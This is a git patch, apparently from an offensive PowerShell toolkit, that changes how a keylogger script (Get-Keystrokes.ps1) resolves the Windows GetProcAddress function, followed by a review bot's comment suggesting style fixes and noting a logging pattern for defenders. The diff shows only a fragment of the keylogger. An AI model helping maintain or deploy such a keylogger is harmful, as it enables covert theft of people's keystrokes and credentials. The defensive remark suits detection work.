From 193b9b5bdc59bbd5b40e4f50e8e5334f7562f557 Mon Sep 17 00:00:00 2001
From: p0shkatz <30280007+p0shkatz@users.noreply.github.com>
Date: Fri, 21 Sep 2018 07:42:19 -0500
Subject: [PATCH] Update Get-Keystrokes.ps1 Modified $GetProcAddress definition
---
 Exfiltration/Get-Keystrokes.ps1 | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Exfiltration/Get-Keystrokes.ps1 b/Exfiltration/Get-Keystrokes.ps1
index 47761b99..6a4f82dd 100644
--- a/Exfiltration/Get-Keystrokes.ps1
+++ b/Exfiltration/Get-Keystrokes.ps1
@@ -108,7 +108,7 @@ function Get-Keystrokes {
 $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
 # Get a reference to the GetModuleHandle and GetProcAddress methods
 $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
- $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
+ $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);
 # Get a handle to the module specified
 $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
 $tmpPtr = New-Object IntPtr
@@ -374,4 +374,4 @@ function Get-Keystrokes { [void]$PowerShell.BeginInvoke() if ($PassThru.IsPresent) { return $PowerShell } -} \ No newline at end of file +}
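Review bot: The new `$GetProcAddress` lookup in the first hunk (new line 111) has no comment saying why the six-argument `GetMethod` overload is needed, and it is written differently from the lines around it. Presumably the name-only lookup became ambiguous because the type exposes more than one `GetProcAddress` overload; a comment such as `# Bind the (HandleRef, string) overload explicitly; a name-only lookup can match several overloads` would record that. The type literal `[System.Runtime.InteropServices.HandleRef]` would replace `(New-Object System.Runtime.InteropServices.HandleRef).GetType()` without allocating an object, and the trailing `;` can go to match the neighbouring lines. For defenders, the reflective resolution of `GetProcAddress` through `Microsoft.Win32.UnsafeNativeMethods` is a stable string pattern that PowerShell script block logging would record. The enclosing function starts and ends outside the hunk.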